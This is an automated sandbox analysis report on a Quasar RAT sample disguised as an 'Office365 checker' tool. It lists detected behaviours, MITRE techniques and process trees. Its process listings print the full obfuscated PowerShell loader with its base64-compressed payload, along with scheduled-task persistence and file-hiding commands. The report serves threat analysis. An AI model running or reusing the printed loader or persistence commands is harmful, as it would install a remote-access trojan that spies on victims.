Malware Analysis Report

2024-08-06 11:49

Sample ID 240608-v319paef95
Target OFFICE365 CHECKER FAST PROXYLESS.bin
SHA256 06f18c05b6a52cea7751c0ee3fbec0f8977b0689f879899c04ac83c8f7612621
Tags
quasar bec execution spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06f18c05b6a52cea7751c0ee3fbec0f8977b0689f879899c04ac83c8f7612621

Threat Level: Known bad

The file OFFICE365 CHECKER FAST PROXYLESS.bin was found to be: Known bad.

Malicious Activity Summary

quasar bec execution spyware trojan

Quasar RAT

Quasar payload

Blocklisted process makes network request

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Unsigned PE

Command and Scripting Interpreter: PowerShell

Program crash

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-08 17:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-08 17:31

Reported

2024-06-08 17:34

Platform

win7-20240419-en

Max time kernel

15s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe
PID 1720 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe
PID 1720 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe

Processes

C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe

"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"

C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe

"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"

Network

N/A

Files

memory/1720-0-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/1720-3-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/1720-1-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/1720-2-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/2516-37-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/1720-36-0x0000000002E80000-0x00000000034C6000-memory.dmp

memory/2516-38-0x000000013FBA0000-0x00000001401E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17202\python311.dll

MD5 a72993488cecd88b3e19487d646f88f6
SHA1 5d359f4121e0be04a483f9ad1d8203ffc958f9a0
SHA256 aa1e959dcff75a343b448a797d8a5a041eb03b27565a30f70fd081df7a285038
SHA512 c895176784b9ac89c9b996c02ec0d0a3f7cd6ebf653a277c20dec104da6a11db084c53dd47c7b6653a448d877ad8e5e79c27db4ea6365ebb8ca2a78aa9c61b38

memory/2516-40-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/2516-39-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/2516-44-0x000000013FBA0000-0x00000001401E6000-memory.dmp

memory/1720-77-0x000000013FBA0000-0x00000001401E6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-08 17:31

Reported

2024-06-08 17:34

Platform

win10v2004-20240426-en

Max time kernel

32s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ifconfig.me N/A N/A
N/A ifconfig.me N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2272 set thread context of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2868 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe
PID 2868 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe
PID 4788 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 4788 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 2816 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2816 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4788 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 4788 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 3540 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3540 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4788 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 4788 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 3552 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3552 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4788 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 4788 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe C:\Windows\system32\cmd.exe
PID 3552 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3552 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1436 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1436 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1436 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2272 wrote to memory of 4404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2272 wrote to memory of 4404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4404 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4404 wrote to memory of 4764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2272 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe

"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"

C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe

"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"

C:\Windows\system32\cmd.exe

cmd /C echo Y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "& ( $sHEllid[1]+$sHeLLID[13]+'X') ( NEW-objeCt sySTEM.IO.comPRESSiOn.DEFLAtEsTREAm([IO.memorYsTREAm] [SYsTEM.CoNvERT]::FROMBaSe64StrINg('zRr7T+M4+nck/gdvtatNj06H1yE03Upb2hxUgga1neHuEIvSxKVZUifrOEB3mP/9Ptt5OXFauJ1KGyHaOP7eT3/pj07UD1yMuujXn3d34sgjD2iyihhedtTbdj/wfewwLyBR+xwTTD2numUZBgQTdgUo/fLToVVeufTIH+W1cUyYt8TtIWGYBuEE0yfPwVF52xS/sPLaCPOl3R1iL3EU2g5GDEcspB5huztfd3cQXGE88z0HOb4dRWiCGQP4SD76ymFRct0OfH8I0lBmNB4xJdg/Omy7vt9ocahLO2ImpQEFvTEa4+ZdDgn0nmyGUcRsBpSATwBHIM41o+iLR1ls+z3fDxzzxUhWQxqAiFEr3WW7LhX3wDmKvD9xC8X8q83BbG6C6SpMF+f+NQ0YWKbZ2R77syDwUZ9ieHItmTUiRrnu7TAcgb5bKLl3lm4mR4SdHoPlWbbCFoDDTRcFVo8swJfYhU1cH0eJUA4nBXL+y7cfogw3Jk8eDcgSPCxb291xYkphZeBRUEJAVzl5ZoO2wyGZB9laomq+tnV93YBYqbqu8BJYSw2+4KuKuUEZK4Zv75BrM7to+CBm4u4ZkDFMtsn0U+C5aIrp0iMFOxdZFk4pDIRfPMYTxzb54XTGOIqXeCrcJmNF3m7dfueYSUr9AJLRCyvRz+znyMdb52fyN+PnJng+Of67KUkw9Z00RRhw85c5GrHPZGmHXzz8bM0nsoRWoypd6EEy2HqQj5n/X6iualJairs892xNK4KFEZOhXZNmtu4nw0h4Sm2W43lXbLz3lJ2ca194TE4G3ChiMi/2x2Zvat6PzJv7vjWaWJcmsLX/si+ug/3OJqDrsdU3J5P787H1+ToHPdzfAGrd3wxHA+tGgpxKemtBJp8n1+ZoYA4KDO4frwX5PBr2rYF5b46+DMfW6MocTXPg4zp6A3Pa61+Yg1S2Ir1TPcjIGl/1LgFgaI2H0//c9y97CtxhDamL4flFPdRpDVTvzPrCVbiO5mmtOkE1l9PhlVlL96AOcji4rIcCfRagkrY18eOk9YHUO8Z/xNDjps1YTP1mDvQ1/5o8h64SGvSIt/typW0uQ7ZSnJnRlRYFv2S7bdzgWd/3MO/T5EcXEfyMsmWj2VThSmj4VWBFImkPgmfiB7Y7EZwZXJaOCvctvy18hY7YWSDDfHFwyHMrhLleCfyCghAFPm6L3gzOH9hoyOQROKKPdJEbS+WaU+BRaPcTaqA9wNq+gvi3H5TE+K2oOopZDPklFa2jZVc1pciFJCDwF6RWXARR3t86wXLJW2NgNesRQ3vFFVUvpejQ7v25zc3SRVc2jRa23x5D7YNEd3RoJBha4G1HTlnN0QJSrSgB1twSKrX9CwDFtIrr4CTHlVHcA7QHx3q0JF7OMM0KYfQOlCdljGmlsubDJdhlvaQKqn/u1+OSomoYq8dWkZVjS89qmaw54pKm4IOTDuYGwDWTu7LuNRQ8LvWZHb1H8iMtr8mJ05qbBOI/DDwR1G/FeXiq1sMUa3Jm4UmtRDOprMuT45nHKcny256A3Ogf6BR1u+jkWA8jqzHAzG1fxJi6S3PQjBkuWlMcvi/O/WBm+8b+y3FFIdWjYj30wX5VdLW7KnPCY65KU4UpkObbdUSENhayGwH21LM5iX2/leSRRLUce+lGKLBVTc36Sviq621e63uX10qjUaXUQpJT+b+qqdJpvcbWadNW9Vh4atSc+Ivw8lSwERx8Pd0wEQFqsFXIo1ZubTY1UTBHxg+plV5fC6x2i7YQj1IulCfVQqorpbzs1NdKIara7qp9bhpUVf61Z5ccOJU8S0RVDNm5Rs6usDsRk7lueRS2BmmrmORFyYL2SIRRNYuDviukqqqu7kiJGh8OmrotP3Q1wm5scirDlFzKCuv8ShsBGblK6U9rvgaqzv5lU2jmUWu1niV7pS5KlymMo1Qic+ilDFGcRNqHj18qNR9W9/Y2ay+fIubVsz4TyyJUxqHmVQVVq6Zy8Sul0Q/CVV70aiv6HogMdUvga6E3U+Fqok+2ttJWkJyKUlspHBke+5mb6T24tApLcCUNwXvQVfrIFN2TjPR3sKdXV2FCmpw4xEoi+Z0W5iyezzFtn4HpHlVj5kK2kqHrfivVok6S90UPaAQsm2JO0FZCp4j/29pOJhlkrXF/p6L/tT1Fsl+FSHELWaVxFPKyGYEj7Uxf6rJCsjG29bPDbD6nUF1zDOQXhi5mI73vQ0qcq2YvWi+uKMrW1NPEhcF3h4Xe/YzP0skTpgxcFTg9g12RoRRVRXdv8UTO5h46bSm0RNHckMA3+YCI9RnEStHXNeeH7+IhlUHu9jzk/ydV9ZGQ4icviKNJHIWYAGgszlPKywzNW4xUSXrwLoLeZKMYwGzwLMcxHjk6zKYiRmrXczkylU/56MNovm3OohlceOR3nrvJg3EmHft602Qi7XCubbbg74tnfASTvPM189d7nMtkNXuvZ0BpbXgE6Pt+zDy/jV9wg681WhldxedqeU+i8N/WeIAdcFehn+wdo1jB7lSEcbL6iFfrpy0cZWpmBUX7EpMHtkAf0WlHmwtcnOwWUV8sbBnOuxKkrsfKNr+xuUoEA/3bdNVfxOSxwvkknsldormBVKJtGDjhHJALwY+jMp21pwFfMApUWuhQh0XVwq13B0gMjrppqLh/47a49dBP/DNR7t2G+E/mciqNN0/npJMb9fZPVPknngHThaFsY8FY+OnjR/4rBN7Ri98lYAqKabux8+iSqB3Qh49nZr/9e/jQ0M1Q0vBSXRUogds7gYtnUP4bSvwmfb9cgBv4+/nXTqfnuh/4jwaQ+D/Ac494Ylj6Y/IDkA+XNnmI+RStP1nYNOx0brNfT7TTH0rcffqUauN/' ),[sySteM.IO.cOmpReSSIoN.COMprEssIOnMode]::DECoMprEss)|FoREach-ObJEct{NEW-objeCt SYsTeM.io.sTreamReader( $_ ,[texT.eNcodiNg]::ASciI) }|fOReach-ObJECt{ $_.ReadTOEND( ) } )""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "& ( $sHEllid[1]+$sHeLLID[13]+'X') ( NEW-objeCt sySTEM.IO.comPRESSiOn.DEFLAtEsTREAm([IO.memorYsTREAm] [SYsTEM.CoNvERT]::FROMBaSe64StrINg('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' ),[sySteM.IO.cOmpReSSIoN.COMprEssIOnMode]::DECoMprEss)|FoREach-ObJEct{NEW-objeCt SYsTeM.io.sTreamReader( $_ ,[texT.eNcodiNg]::ASciI) }|fOReach-ObJECt{ $_.ReadTOEND( ) } )"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9EC.tmp" "c:\Users\Admin\AppData\Local\Temp\oikjrjhe\CSCC888C55530274DE68E10821A87175D4.TMP"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2272 -ip 2272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 2120

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
